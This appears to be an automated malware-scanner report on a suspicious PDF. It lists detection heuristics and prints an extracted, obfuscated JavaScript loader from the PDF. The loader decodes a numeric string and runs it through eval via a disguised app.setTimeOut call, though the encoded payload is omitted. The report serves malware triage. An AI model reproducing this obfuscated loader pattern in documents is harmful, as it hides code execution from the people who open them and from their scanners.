SUSPICIOUS
Risk Score: 56
Machine Learning
- Nyx PDF Classifier malicious score 0.9999
Heuristics 4
- JavaScript action (low, 1 related finding), PDF_JAVASCRIPT: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Embedded JS stream (low), PDF_JS: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Optional Content Group with action trigger (low), PDF_OPTIONAL_CONTENT: Optional Content Group (layer) co-occurs with an action trigger: content can be selectively hidden from viewers or scanners while the action still fires on open.
- Suspicious extracted artifact (info), EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0010_000.js | pdf-javascript-stream | PDF /JS object 10 at offset 0x7062 | 8330 bytes |
| stream_001_off00007062.js | decompressed-pdf-stream | PDF FlateDecoded stream at offset 0x7062 | 4164 bytes |

javascript_obj0010_000.js
SHA-256: 00bc08d61a1d3d6364214a463c84e2e47777e8854317124d74c4f35a19618595

Preview script: first 1,000 lines of the extracted script

var AvVSJM1='[long encoded string omitted]';
var YI7NER5GY=229;
AvVSJM1=AvVSJM1.replace(/[^0-9]/g,':');
xiTXKbYq='YI7NER5GY';
AvVSJM1=AvVSJM1.replace(/::/g,'');
app.alert(AvVSJM1);
function S8WxrSAKxyq2(FuigsZiEIUxU,R72EBU5tsvxe){var FiW0O=new String(); var E2UFc92VKB=new String();
DGhYa=FuigsZiEIUxU.split(':');
for(CZaMfya7=0;CZaMfya7<DGhYa.length-1;CZaMfya7++){PrfWaCgz=String['fromCharCode'](DGhYa[CZaMfya7]-R72EBU5tsvxe);;
E2UFc92VKB=E2UFc92VKB+PrfWaCgz;}return E2UFc92VKB;};
xiTXKbYq=S8WxrSAKxyq2(AvVSJM1,YI7NER5GY);
var DkwDSUnW='a';
var ROsjMTqP='u';
liliCc9X96Sq=app['set'+'TimeO'+ROsjMTqP+'t']("ev"+DkwDSUnW+"l(xiTXKbYq)",1);

stream_001_off00007062.js
SHA-256: 4d8c1d022fcca69f1b2afe1664250312f1bc921ee80a0da68b26bd84f6daa001
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).